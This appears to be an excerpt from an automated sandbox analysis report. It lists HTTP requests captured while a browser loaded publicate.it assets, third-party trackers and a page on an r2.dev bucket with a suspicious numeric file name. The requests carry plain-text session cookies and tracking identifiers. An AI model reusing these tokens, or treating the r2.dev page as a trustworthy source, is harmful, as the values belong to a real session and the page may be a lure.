        Source: global trafficHTTP traffic detected: GET /alvis-onboard-1.0.8.js HTTP/1.1Host: assets.getalvis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/outlook_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /images/gmail_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /?sid=bElvO73dOjE4ZMqj&data=eyJnYVRyYWNraW5nSWRzIjpbIlVBLTUyNTk3MDkwLTEiXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbIjEzODE2ODA2MDYuMTcyNTAzNDU3OSJdLCJjb250ZXh0Ijp7ImxpYnJhcnkiOnsibmFtZSI6ImxmdHJhY2tlciIsInZlcnNpb24iOiIyLjY0LjAifSwicGFnZVVybCI6Imh0dHBzOi8vcHVibGljYXRlLml0Lz91dG1fc291cmNlPXB1YmxpY2F0ZV91c2VyX2V4cG9ydGVkX2VtYWlscyZ1dG1fbWVkaXVtPXJlZmVycmFsJnV0bV9jYW1wYWlnbj1wb3dlcmVkX2J5X3B1YmxpY2F0ZSIsInBhZ2VUaXRsZSI6IlB1YmxpY2F0ZSB8IEhUTUwgRW1haWwgVGVtcGxhdGUgQnVpbGRlciIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNjhjYmY1NTkyMTJlYjkyNyIsInNjcmlwdElkIjoiYkVsdk83M2RPakU0Wk1xaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuZWQxZTM0NDk3OGE2NTFjNy4xNzI1MDM0NTc5Njk4IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0= HTTP/1.1Host: tr-rc.lfeeder.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /c/hotjar-2431713.js?sv=7 HTTP/1.1Host: static.hotjar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/mailchimp_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /images/yahoo_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /images/macOS_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /, HTTP/1.1Host: pub-e1c6f3d85d51402790227684363ac52c.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/send_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /images/hubspot_client.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /images/more_clients.svg HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /images/features_review_icon.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
        Source: global trafficHTTP traffic detected: GET /images/adobe_review.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579
        Source: global trafficHTTP traffic detected: GET /images/Trustpilot_logo.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-JL3QGDSQZ4&gacid=1381680606.1725034579&gtm=45je48s0v874630860z8850968419za200zb850968419&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=417783928 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-8ML5ENYGMT&gacid=1381680606.1725034579&gtm=45je48s0v887450065z8850968419za200zb850968419&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=1212565528 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /tag/kuemlmuzvn?ref=gtm2 HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /js/profitwell.js?auth=c61691493c428b337ecf0f72fa2f9c82 HTTP/1.1Host: public.profitwell.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /images/template1-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/template2-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/adobe.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/microsoft.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/home_banner.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/groupon.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /images/logo_white_text.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
        Source: global trafficHTTP traffic detected: GET /js/webflow.js HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
